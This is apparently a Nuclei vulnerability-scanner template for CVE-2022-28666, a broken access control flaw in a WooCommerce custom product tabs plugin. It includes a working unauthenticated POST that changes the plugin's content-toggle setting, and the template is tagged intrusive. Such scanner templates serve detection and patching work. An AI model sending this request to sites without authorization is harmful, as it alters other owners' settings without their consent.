id: CVE-2022-28666

info:
  name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
  author: Sourabh-Sahu
  severity: medium
  description: |
    YIKES Inc. Custom Product Tabs for WooCommerce plugin <= 1.7.7 contains a broken access control caused by improper permission checks in the yikes-the-content-toggle option update, letting attackers modify content without authorization.
  impact: |
    Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
  remediation: |
    Update to the latest version of the plugin, above 1.7.7.
  reference:
    - https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28666
    epss-score: 0.01184
    epss-percentile: 0.63642
    cwe-id: CWE-287
    cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "yikes-inc-easy-custom"
  tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive

http:
  - raw:
      - |
        POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        toggle_the_content=false

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'success','Settings updated')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100dca857fe40c8b7f46a5659357f76e8f543f9b143259113f3ada076daf52a29bb022030aeb39d24c11616b1267b11f03cda4857c6d2f9e2fa5136c91d87885a29ec88:922c64590222798bb761d5b6d8e72950